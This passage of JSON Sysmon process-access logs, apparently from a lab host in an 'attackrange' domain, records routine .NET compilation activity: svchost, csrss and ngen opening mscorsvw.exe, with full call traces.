{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6827,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010AA810D00}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010AA810D00}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6828,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.574\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010F3840D00}\r\nTargetProcessId: 3392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.574","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010F3840D00}","TargetProcessId":"3392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6829,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.574\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010F3840D00}\r\nTargetProcessId: 3392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.574","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010F3840D00}","TargetProcessId":"3392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6830,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010F3840D00}\r\nTargetProcessId: 3392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010F3840D00}","TargetProcessId":"3392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6831,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001085880D00}\r\nTargetProcessId: 3256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001085880D00}","TargetProcessId":"3256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6832,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001085880D00}\r\nTargetProcessId: 3256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001085880D00}","TargetProcessId":"3256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6833,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001085880D00}\r\nTargetProcessId: 3256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001085880D00}","TargetProcessId":"3256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6834,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.699\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00101C8C0D00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 